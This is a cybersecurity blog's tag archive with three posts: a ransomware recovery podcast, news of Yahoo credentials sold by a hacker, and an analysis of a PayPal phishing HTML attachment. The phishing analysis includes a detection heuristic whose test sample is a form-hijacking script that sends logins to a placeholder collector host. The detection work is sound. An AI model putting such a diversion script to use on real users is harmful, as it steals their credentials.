
Tag Archives: cybercrime

CyberScoop Radio NeuShield Interview


How do you fight off a ransomware attack?

A few days ago I was interviewed by Greg Otto from CyberScoop on a subject and company dear to me, NeuShield. Here are some excerpts from their article and also a link to the full interview which was recorded on June 24, 2020.

“Ransomware has been one of the biggest threats in cybersecurity over the past few years. Hospitals, governments, cities, companies, they’ve all been impacted by this wave of malicious behavior.

But what happens when an enterprise is hit? What goes on in the short term? How do you stop the bleeding? How do you recover? On this episode, Greg Otto talks with David Macias, president of ITRMS, an IT service provider based in California. Macias, a victim of a ransomware attack, tells us how he recovered, what he learned, and what he tells his clients to do in order to prevent a similar incident from occurring.”

To hear the full podcast please click on this link.

To read our full article on NeuShield.


Hacker Selling 200 Million Yahoo Accounts On The Web


Hardly a day goes by without headlines about another data breach. The latest is news about the same hacker who was responsible for selling data for MySpace, LinkedIn, Tumblr and VK.com. There is evidence that this hacker is now selling login information of 200 Million Yahoo users.

The hacker, who goes by the name “Peace,” has uploaded 200 Million Yahoo credentials and is selling them on an underground marketplace called The Real Deal for 3 Bitcoins.

Yahoo has admitted the company was aware of the potential leak, but has not yet confirmed the authenticity of the data.

The compromised data includes usernames, MD5-hashed passwords and birthdates from 200 Million or so Yahoo users. In some cases, there are also the backup email addresses used for the account, country of origin, as well as the ZIP codes for United States users.

Because the passwords are only MD5-hashed, attackers can easily recover them using MD5 lookup and cracking tools readily available online.

Last week, Verizon acquired Yahoo for $4.8 Billion. The hacker probably decided to monetize the stolen user accounts before the data lost its value.

Although Yahoo has not confirmed the database breach, users are strongly advised to change their passwords. We at IT Resource Management Services recommend passwords longer than 10 characters that combine upper-case, lower-case, numeric and special characters, and we also strongly advise that passwords be changed every six months. Many companies now offer two-factor authentication for online accounts, and we strongly recommend this option. We strongly recommend that you update your passwords immediately, especially if you are using the same password for multiple websites.

Advanced phishing tactics used to steal PayPal credentials


Posted June 14, 2016 by

Phishers are back to using an old tactic in a new fashion to get hold of their victims’ credentials.

One of the first lessons you will learn during anti-phishing training is to hover over the links in a mail to see if they point to the site where you would expect them to point. Although good advice, this is NOT a guarantee that you are going to be safe.

Always visit sites directly, never follow the URLs presented to you in emails or attachments.

Phishing definition

Per Wikipedia:

Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.

What does this phish do?

As reported by UK malware researcher @dvk01uk, the phishers are using JavaScript to send the user to the promised PayPal site while the login credentials are being sent to an entirely different domain.

The JavaScript runs as soon as the page (HTML attachment) is loaded, intercepts all posts to PayPal.com and diverts them to the actual phishing page, which accepts all your details if you are unwise enough to fall for this trick.

In this case, the phish was pointing to PayPal and the phishing page is www[dot]egypt-trips[dot]co which appears to be an unused WordPress site. (We have informed the registrant of the phish, so we hope they will take appropriate measures.)
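The following is an added example, not code from the original post or from the researcher's report: a heuristic triage check for HTML attachments that flags a script which hooks form submission and references a host the form markup does not declare, which is the mismatch that hovering over the link cannot reveal. The sample attachments are constructed, and `collector.example.invalid` is a placeholder host.

```javascript
// Added example: heuristic triage of an HTML attachment (regex-based, not a full HTML parser).
// Constructed sample; collector.example.invalid is a placeholder host.
const SUSPICIOUS_SAMPLE = `
<form id="login" method="post" action="https://www.paypal.com/signin">
  <input name="email"><input name="password" type="password">
</form>
<script>
document.getElementById("login").addEventListener("submit", function () {
  this.action = "https://collector.example.invalid/post.php";
});
</script>`;

// Constructed benign sample: a submit handler that only validates input.
const BENIGN_SAMPLE = `
<form id="login" method="post" action="https://www.paypal.com/signin">
  <input name="email">
</form>
<script>
document.getElementById("login").addEventListener("submit", function (e) {
  if (!this.email.value) e.preventDefault();
});
</script>`;

function hostOf(url) {
  try { return new URL(url).hostname.toLowerCase(); } catch (err) { return null; }
}

function triageHtmlAttachment(html) {
  // Hosts the reader can see by inspecting the form markup.
  const declared = new Set();
  for (const m of html.matchAll(/<form\b[^>]*\baction\s*=\s*["']([^"']+)["']/gi)) {
    const h = hostOf(m[1]);
    if (h) declared.add(h);
  }
  const findings = [];
  for (const s of html.matchAll(/<script\b[^>]*>([\s\S]*?)<\/script>/gi)) {
    const js = s[1];
    // Script touches form submission: sets .action or hooks the submit event.
    const hooksSubmit = /\.action\s*=|\bonsubmit\b|addEventListener\(\s*["']submit["']/i.test(js);
    if (!hooksSubmit) continue;
    for (const u of js.matchAll(/https?:\/\/[^\s"'<>)]+/gi)) {
      const h = hostOf(u[0]);
      if (h && !declared.has(h)) findings.push({ declared: [...declared], scriptHost: h });
    }
  }
  return findings;
}

console.log(triageHtmlAttachment(SUSPICIOUS_SAMPLE));
```

Because this is a static heuristic, obfuscated or dynamically built URLs will not match, so a clean result does not make an attachment safe to open.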

Blocked

While giving the site owner some time to clean up his site, users of Malwarebytes Anti-Malware Premium will find that the phishing page is blocked if they have the Malicious Website Protection enabled.


Pieter Arntz
